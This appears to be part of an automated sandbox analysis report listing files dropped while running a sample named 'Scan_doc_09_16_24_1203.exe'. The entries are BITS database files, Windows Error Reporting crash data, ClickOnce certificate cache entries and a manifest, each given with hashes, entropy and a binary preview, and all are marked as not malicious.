SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrK:KooCEYhgYEL0In
MD5:	3CC24F6D4015F70B5C168B0502A0B3E7
SHA1:	264C07C5AAADF3E606C60841A1F757F31A1F049C
SHA-256:	DECA302732378C39AC19CEACFB10BFF82BCE56A68630AA345552FACBDE01A247
SHA-512:	95CC33C6AEADA225237F23E0641CD77566258AF91D20F2183FDC72D70129A8357381056AB8A5C20907995500F5A0D15CDC97EBFF2FD9EF37CB3A8134586D50FD
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x408ee56c, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42213359664585876
Encrypted:	false
SSDEEP:	1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
MD5:	469A42E619AF87552B24DD4965DE338A
SHA1:	C7B014E054243985F3D701EA149AA9644B7F7B27
SHA-256:	D41C3D40B143BF84CACDC09F43ED3D74029F178B6FCFB7469D09394961BE5F17
SHA-512:	94D1C00F35045D5137B4D1FA6ACCE27A9C932E38559F36B1E837CCBF59337B25AC3D8AA52C2D750C0F7DA0C0DE80842C17A70510F2F3BC6734B92AE1EB2DF276
Malicious:	false
Preview:	@..l... .......A.......X\...;...{......................0.!..........{A......\|O.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................##M}.....\|..................?{3......\|O..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07628756745831947
Encrypted:	false
SSDEEP:	3:SmXEYeBQjWjn13a/qYFqj1lollcVO/lnlZMxZNQl:SmUzBQjW53q/qjQOewk
MD5:	F11BC635BC8112579ED261A0108A5FBF
SHA1:	8190631E46C37634E9E68239F1CC8696021FEA31
SHA-256:	7732FCF6F3E8B1F758064C85BFB0B833A5513D994870ADB91DB1BEEB019A0D3E
SHA-512:	BD47AEA97B59B6B7BB2E8ED7CB9AE32BBD788F0A9A7988FB4A3592552F082FA1FECE6DAEAFCA1B33060CD481504A9283B3E07E9A12CFB52B4BC3CFC16F964544
Malicious:	false
Preview:	.8.......................................;...{.......\|O......{A..............{A......{A..........{A]................?{3......\|O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_aedb73e836754362da95bba687cf27318a3fb5be_aa7badcc_0fa6576a-6384-4927-8d48-c234dc77d347\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.925147521992023
Encrypted:	false
SSDEEP:	192:caZaEPnDP0BU/kkgjK0ozuiFXZ24IO8ks:+2nD8BU/YjkzuiFXY4IO83
MD5:	36F51B4D4BB39F3AD036BB815C6169A2
SHA1:	60FD213E80477705F7C8FCECB84D9645FF247E0A
SHA-256:	A8A77EDEFC70FE1E3BE67F094358D17FFF6C77F836A8A059D76DCF13BFC554EF
SHA-512:	A8B5A2095DA2D85F7B2C9F881965D5F832C9EAA10561B7F30B11E1A2869063EB25B11F75D01B0318639574A680D3489991137BB2A6DA830C0F7462CE10563327
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.1.6.1.7.8.2.6.6.2.2.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.1.6.1.7.9.9.0.6.8.4.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.a.6.5.7.6.a.-.6.3.8.4.-.4.9.2.7.-.8.d.4.8.-.c.2.3.4.d.c.7.7.d.3.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.5.8.c.d.b.a.-.7.7.1.9.-.4.d.c.9.-.b.3.1.c.-.d.3.1.b.8.a.9.b.e.f.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.a.n._.d.o.c._.0.9._.1.6._.2.4._.1.2.0.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.4.-.a.e.8.f.-.8.4.d.3.8.1.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.a.4.8.a.e.7.5.c.7.4.c.0.b.5.8.3.7.e.4.0.b.4.c.2.a.f.1.7.b.d.7.0.0.0.0.f.f.f.f.!.0.0.0.0.5.f.e.7.6.9.1.7.1.8.0.2.6.9.4.b.b.1.3.f.d.3.3.8.8.0.6.5.c.1.1.1.c.8.7.4.0.b.e.b.!.S.c.a.n._.d.o.c._.0.9._.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8DC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Oct 2 04:16:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	82244
Entropy (8bit):	1.6824982200060135
Encrypted:	false
SSDEEP:	384:pWKy95niHXhI/irQeW5HZptrVUttdw1H4:gKy9lihI/7eWrXrV0w1Y
MD5:	31C70CE1E95DE89B636A965F6187C452
SHA1:	182248EBD431384E254E25895F7625B2E1998485
SHA-256:	A050C15A558B987E2C175BCE7325A662ED6DCEFD254200F8148E1E8E0EDF7EB8
SHA-512:	22B0BEE5A62E0D09DB558A9BCEF204BE09EE39978DCD7179899C9D440196BEF1AD050EAED41AECF3EB1507CF3DD5C7390E522C3668A783CE61D549C0D9BFC9A8
Malicious:	false
Preview:	MDMP..a..... ..........f....................................4....;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB1F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.7024193425380454
Encrypted:	false
SSDEEP:	192:R6l7wVeJ786Y6Y96SUedgmfztYprO89be0sfjKm:R6lXJQ6Y6YwSUedgmfztCenfP
MD5:	FD90A4D2AE409CB4E71CC6C43F34E287
SHA1:	9065A27C8657F599248EA8B05738523E4EBAA02D
SHA-256:	403FD04F400F0342395139C122B302B4BB5C5528769CEAB94AC9CB281C9058BB
SHA-512:	A6628E735908B4628B9FD9172C9DE07D0DBE44467CADCB096C5E6361EF2B3A162EFE577B9916015DF4E882CEA55945EE8102A16B075BD9CBB24E20AFD59F9078
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD14.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4653
Entropy (8bit):	4.500441631102047
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9w7WpW8VYRYm8M4Jq/5yLF7M+q8/ItyZBkJId:uIjfFI7iK7VBJ25OMm4nJId
MD5:	1F67F8B49F7A670581CD911943E335A7
SHA1:	7795446E5E8350AD3ACF203C10E7765F5506ED0C
SHA-256:	7DE19EC8E12C702A07586BB1EF5A1ED7BB300E108AE0F0EE3E365B53EC37F274
SHA-512:	B0FD3F1899776A4CFF8DEA8A6BE72FA48C138C1CD9BA4658E20F3E3E0B7E297C7F78BFD316EE662E5E2C5C67BB2134A4D123063338001F115237057E351757E4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525319" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD7F.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80572
Entropy (8bit):	3.0753010545679524
Encrypted:	false
SSDEEP:	768:5FojQVHWlljA/Aqa8h6Pp6U01T70ZbFyopFFtZu/Wbm9yzoI:5j8lljh8q01Z70lFyoTwubm9ov
MD5:	9454CFF38B4FF9A7C6154508935F091B
SHA1:	2F05E39FF0971FCEA393629B440B40F700A20977
SHA-256:	AE5063A9459178A27F452CA2C1AB44F8D0470CE687D45773BEAE7CF6920CD052
SHA-512:	03EFBBFD4F85C7AF6B1A8C6F647BCE1569DA3D054CF2D795FCE854D57788CFD2AB5344D15EA250297CA354A8620CEFEEF2ABA4E82386BA64065778524B8510FC
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE8A.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685181778262058
Encrypted:	false
SSDEEP:	96:TiZYWiizzpmUY4Y0Wr4JHSAUYEZ7ztEim4dfVwrAida1W6M404IlK3:2ZDDPUgta1W6M40flK3
MD5:	91ACE65333E992FAB5E9B7422BD297B5
SHA1:	D66E15373F94D06242FA55ECC086DBE612DA54F7
SHA-256:	93D6C0F92870638E69A2E450C447037A269D47F7BAB1E002BACBB8A3C42DD9B0
SHA-512:	68C990A36B21FF1937A56D39DCFC67AAFA5006E9C6EF9F33593FF33E996829160F3A863773FBF726684B3599A30E80D3BC32FCE789EF09F84C1032DF6158EB6D
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.552295515462603
Encrypted:	false
SSDEEP:	12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
MD5:	D3E1E6C22706565D07C5B9CF083E39F6
SHA1:	12D3BC9406E47A98818A8E21DEEED08DAF79B029
SHA-256:	AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
SHA-512:	BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0....H.............X.Z..hT.F...^.g..n......W.%T.;~.\|LU.......aCW...[....-.k.F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN\|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..1.4.....U.x}n..F....g..\|.......P.\|...G......:.F.w,....mj.kj>..2=9..Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p\|5.6....KN..p.6y..\K........:.T.......q.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.462038329656643
Encrypted:	false
SSDEEP:	6:kKi8/sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:6QHkPlE99SCQl2DUevat
MD5:	B448E480AB007872E062444DBC8D9CD9
SHA1:	49174F632FB0AE41DE871B0026FD6E95DACE882F
SHA-256:	3CDE8123A9BCA1B46B4D5D46059E6FFF266C43EEBF2F285C0ADB315A39A2571A
SHA-512:	1A32CBDAB302D985502049FA076575E6ED33F8088775BE2DF6A079CCBFECD3FCE321ECD4D6C7F01F5043CD94A64BE9D326B81FAF393B58DC6F5CEC872C2C496D
Malicious:	false
Preview:	p...... ............y...(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.210369268758652
Encrypted:	false
SSDEEP:	6:kKN+MlFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:dStWOxSW0P3PeXJUZY
MD5:	556FF3DD3A209FB14B08B42DC72D9B27
SHA1:	F13A718592B8E19C8930EB9829D29E5BFD0A18A8
SHA-256:	F86BD9BFF5D20BD4FD6314B4D55BD6A8BDC3300234939F7383864D8959883204
SHA-512:	2EF7070B63ABA1194B9D16DBE485B4BE71CE1D2942AC0511CAF4FE1117188142D2EBA0D9FCC24A390ADFC4BDF59C94AA5CD105F99FE7B1F3A19B81C8F5539FC4
Malicious:	false
Preview:	p...... ........4.......(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.9931916737225213
Encrypted:	false
SSDEEP:	6:kKjsZk5RvN9zEZ5KfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkr:wZiXuUmxMiv8sFBSfamB3rbFURMOlAkr
MD5:	5F98C70B1D71E56C900AF92551B8B83E
SHA1:	B0197680A8FAE0CE26F9FB22651CA8EE7A13D4F9
SHA-256:	E5801FF0E3171975287042A78B8529169771028D84C6E1423CF66CEF8E2D8175
SHA-512:	6834A473F63E62B4F6A2E8592E6E9BC6B867653DB525BDC90A5530D61D537335509E6561E2375597185762D7BBFBF4F53F6E0436AE93602EB6867B8925645257
Malicious:	false
Preview:	p...... ....(...s.[[....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.052898866971229
Encrypted:	false
SSDEEP:	6:kKcpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:wLYS4tWOxSW0PAMsZp
MD5:	EA93B055B284ADCE7CA11A2B6B9F247C
SHA1:	CF23D63B40B9BF61F5D83844AC6A5F734B34A921
SHA-256:	8AF19A58EDC927030E134BACF86D91F9910DF367CB0827A6FD0BDC96688A5D74
SHA-512:	9831B4214839F684CFD01240BCACE87DA6B338342842CC2B0CB33FE85FD91F61B2CE5846252D4A944339978FB978C8F2720D93735DC064E491A4A1780EB1AB20
Malicious:	false
Preview:	p...... ....l.....f.....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.064257958325849
Encrypted:	false
SSDEEP:	384:Blqv8zGo26tX9DkX9R/QPIBM7YV+++amtU/:Bs0126tX9DkX9R/QPI+0V+++amtm
MD5:	F86795C5144C6F19A6C13A2C746988E7
SHA1:	E297F11A10779FDF9526BA66757A691F8A139D0D
SHA-256:	D95477E702D80AB4777A5E0457414B766DBED6F0592E5FED8F72211C4A885693
SHA-512:	715E692FCB63A6656B585DE2CD538AE93FDCD129D794246E9A092A66EF0C90E58399E66B20C5085306AA79654A6B30CFF5C1232BA631E8CFAF28097F7DAE815E
Malicious:	false
